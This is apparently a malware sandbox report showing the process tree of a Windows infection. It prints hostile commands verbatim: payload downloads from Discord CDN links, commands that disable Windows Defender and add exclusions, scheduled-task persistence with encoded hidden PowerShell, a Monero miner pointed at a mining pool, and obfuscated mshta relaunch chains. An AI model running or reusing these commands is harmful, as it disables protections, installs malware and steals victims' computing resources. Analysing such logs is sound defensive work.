C:\Users\Admin\AppData\Roaming\2113902.scr"C:\Users\Admin\AppData\Roaming\2113902.scr" /S8⤵
-
C:\Users\Admin\Documents\ll7hAlWZUM8aVRdhySt_kLQl.exe"C:\Users\Admin\Documents\ll7hAlWZUM8aVRdhySt_kLQl.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\ll7hAlWZUM8aVRdhySt_kLQl.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\BqM9xg9qbPitNmvDRi7VB_Mv.exe"C:\Users\Admin\Documents\BqM9xg9qbPitNmvDRi7VB_Mv.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\2C6C.bat C:\Users\Admin\Documents\BqM9xg9qbPitNmvDRi7VB_Mv.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/892683460685221901/894952595939004426/1.exe" "1.exe" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\AppData\Local\Temp\7930\1.exe1.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879751738779910146/886597429477122078/55.exe" "55.exe" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879751738779910146/879751944061734982/setup.exe" "" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "" "" "" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\Documents\NxIkUSKf9VBiWWvuufV4fDQe.exe"C:\Users\Admin\Documents\NxIkUSKf9VBiWWvuufV4fDQe.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS248A.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS5128.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
- Executes dropped EXE
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goejnMuUh" /SC once /ST 06:50:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 09:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\ptbavum.exe\" uG /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\J492h11PeW4FIMg2ZMZJh672.exe"C:\Users\Admin\Documents\J492h11PeW4FIMg2ZMZJh672.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\J492h11PeW4FIMg2ZMZJh672.exe"C:\Users\Admin\Documents\J492h11PeW4FIMg2ZMZJh672.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\lQsTdAlkjYNFfnwvOn0eBKaz.exe"C:\Users\Admin\Documents\lQsTdAlkjYNFfnwvOn0eBKaz.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\luvO_4is6mQFfHuxYrzdcbZB.exe"C:\Users\Admin\Documents\luvO_4is6mQFfHuxYrzdcbZB.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\BVEDf_soBBvQiBPdzpwHsDT7.exe"C:\Users\Admin\Documents\BVEDf_soBBvQiBPdzpwHsDT7.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\YsrDtrUWJpAIJknuajZA_Tgl.exe"C:\Users\Admin\Documents\YsrDtrUWJpAIJknuajZA_Tgl.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4229854.scr"C:\Users\Admin\AppData\Roaming\4229854.scr" /S7⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\2353450.scr"C:\Users\Admin\AppData\Roaming\2353450.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\7842883.scr"C:\Users\Admin\AppData\Roaming\7842883.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7494909.scr"C:\Users\Admin\AppData\Roaming\7494909.scr" /S7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3987985.scr"C:\Users\Admin\AppData\Roaming\3987985.scr" /S7⤵
-
C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"7⤵
-
C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"7⤵
-
C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"7⤵
-
C:\Users\Admin\Documents\xYJIic1KM0Xbco03L0Ro5fdE.exe"C:\Users\Admin\Documents\xYJIic1KM0Xbco03L0Ro5fdE.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\zcTMrSsC4g_EqadNJiqR1MnZ.exe"C:\Users\Admin\Documents\zcTMrSsC4g_EqadNJiqR1MnZ.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\U4uZdyxAijsXh5zAJKtumxYy.exe"C:\Users\Admin\Documents\U4uZdyxAijsXh5zAJKtumxYy.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\cVMGrdBG7bRqTx2km4LCCZhc.exe"C:\Users\Admin\Documents\cVMGrdBG7bRqTx2km4LCCZhc.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\cVMGrdBG7bRqTx2km4LCCZhc.exe"7⤵
-
C:\Users\Admin\Documents\cVMGrdBG7bRqTx2km4LCCZhc.exe"C:\Users\Admin\Documents\cVMGrdBG7bRqTx2km4LCCZhc.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\omEx3DWuyvkBKV7FT0AQ3ScE.exe"C:\Users\Admin\Documents\omEx3DWuyvkBKV7FT0AQ3ScE.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1015b9a4e0b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1015b9a4e0b.exeFri1015b9a4e0b.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4588 -s 3006⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri106e757f6d75.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri106e757f6d75.exeFri106e757f6d75.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri106e757f6d75.exeC:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri106e757f6d75.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri103a7805577.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri103a7805577.exeFri103a7805577.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1208989.scr"C:\Users\Admin\AppData\Roaming\1208989.scr" /S8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1497499.scr"C:\Users\Admin\AppData\Roaming\1497499.scr" /S8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\5372622.scr"C:\Users\Admin\AppData\Roaming\5372622.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1264582.scr"C:\Users\Admin\AppData\Roaming\1264582.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\2355771.scr"C:\Users\Admin\AppData\Roaming\2355771.scr" /S8⤵
-
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 2368⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\inst001.exe"C:\Users\Admin\AppData\Local\Temp\inst001.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6168⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6208⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6408⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6488⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6448⤵
- Program crash
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"installer.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TJ7Q2.tmp\installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-TJ7Q2.tmp\installer.tmp" /SL5="$2043A,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\vc.exe/install /quiet8⤵
-
C:\Windows\Temp\{7C53AA05-CCE4-4C77-8C6F-741F9CD6258C}\.cr\vc.exe"C:\Windows\Temp\{7C53AA05-CCE4-4C77-8C6F-741F9CD6258C}\.cr\vc.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc.exe" -burn.filehandle.attached=548 -burn.filehandle.self=556 /quiet9⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Windows\Temp\{32A7608C-7D22-456C-A951-25504930A3BD}\.be\VC_redist.x86.exe"C:\Windows\Temp\{32A7608C-7D22-456C-A951-25504930A3BD}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{894E0D6F-26B1-4B5B-9AAC-9662DDE00A68} {C48FB6E2-43A2-4CA3-BFFB-12C92183AF80} 588410⤵
- Adds Run key to start application
- Checks processor information in registry
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 83210⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 7648⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 7608⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 7848⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6168⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 7808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 7608⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 7488⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 9448⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 9248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 8128⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 6088⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))11⤵
-
